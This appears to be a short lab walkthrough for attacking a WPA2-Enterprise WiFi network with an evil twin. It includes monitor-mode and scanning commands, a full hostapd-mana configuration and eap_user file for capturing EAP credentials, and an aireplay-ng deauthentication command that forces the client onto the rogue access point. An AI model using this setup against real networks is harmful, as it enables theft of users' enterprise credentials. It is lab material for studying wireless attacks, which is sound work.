Evil Twin

Two dual-band WiFi interfaces are available on the lab machine. A WiFi network is present in the vicinity of the lab machine and a client is connected to it. Here are the details of the network:

Parameter	Value
SSID	TigerSecurities
Security	WPA2-Enterprise

Objective: Deploy an evil twin using Hostapd-mana. Force the client to join the evil twin network to steal user's credentials.

Start the iw dev dance and check for surrounding networks.

iw dev wlan0 set monitor none

airodump-ng wlan0

Create the mana config file and the eap_user file:

//mana config
interface=wlan1
ssid=TigerSecurities
channel=6
hw_mode=g
wpa=3
wpa_key_mgmt=WPA-EAP
wpa_pairwise=TKIP CCMP
auth_algs=3
ieee8021x=1
eapol_key_index_workaround=0
eap_server=1
eap_user_file=hostapd.eap_user
ca_cert=/root/certs/ca.pem
server_cert=/root/certs/server.pem
private_key=/root/certs/server.key
private_key_passwd=
dh_file=/root/certs/dhparam.pem
mana_wpe=1
mana_eapsuccess=1

// eap_user 
* PEAP,TTLS,TLS,MD5,GTC
"t" TTLS-MSCHAPV2,MSCHAPV2,MD5,GTC,TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP "1234test" [2]

Run host-apd mana with the config file and observe that the evil twin network is now active.

Start a deauth attack on the access point

aireplay-ng -o 100 -a {BSSID} wlan0 --ignore-negative-one

The client is now connected to our access point and can view the captured credentials.

EAPHammer

Same iw dev dance as above, start EAPHammer and then deauth with aireplay-ng (same as above_

Viewing the client credentials